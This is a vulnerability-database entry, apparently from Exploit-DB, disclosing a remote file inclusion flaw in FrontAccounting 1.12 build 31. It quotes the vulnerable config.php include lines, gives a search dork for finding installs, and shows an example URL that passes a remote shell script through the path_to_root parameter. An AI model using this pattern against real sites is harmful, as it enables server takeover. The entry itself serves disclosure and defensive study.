Lucene search
Kezzap66345EDB-ID:4269HistoryAug 07, 2007 - 12:00 a.m.
FrontAccounting 1.12 build 31 - Remote File Inclusion
2007-08-0700:00:00
kezzap66345
www.exploit-db.com
19
AI Score
7.4
Confidence
Low
?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
#FrontAccounting <= Remote File Inclusion Vulnerability
#
#Dork:"FrontAccounting
#
#Vuln Code
##############################################################################################
#
#ERROR1:config.php
#
# include_once($path_to_root . "/config_db.php");
# include_once($path_to_root . "/includes/lang/language.php"); <<< RFI
CODE
#
#
#
#
#BUG1:config.php?path_to_root
#
#Example1:http://site.com/path/config.php?path_to_root=[[Sh3LLScript]]
#
##############################################################################################
#
#http://sourceforge.net/projects/frontaccounting/
#
##############################################################################################
#
#coded by K3ZZAP66345
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################
# milw0rm.com [2007-08-07]Related
prion
prion
Remote file inclusion
2007-08-09 21:17:00
Remote file inclusion
2007-09-27 17:17:00
Design/Logic Flaw
2007-10-01 05:17:00
canvas
canvas
Immunity Canvas: FRONTACCOUNT_INCLUDE
2007-08-09 21:17:00
cvelist
cvelist
nvd
nvd
cve
cve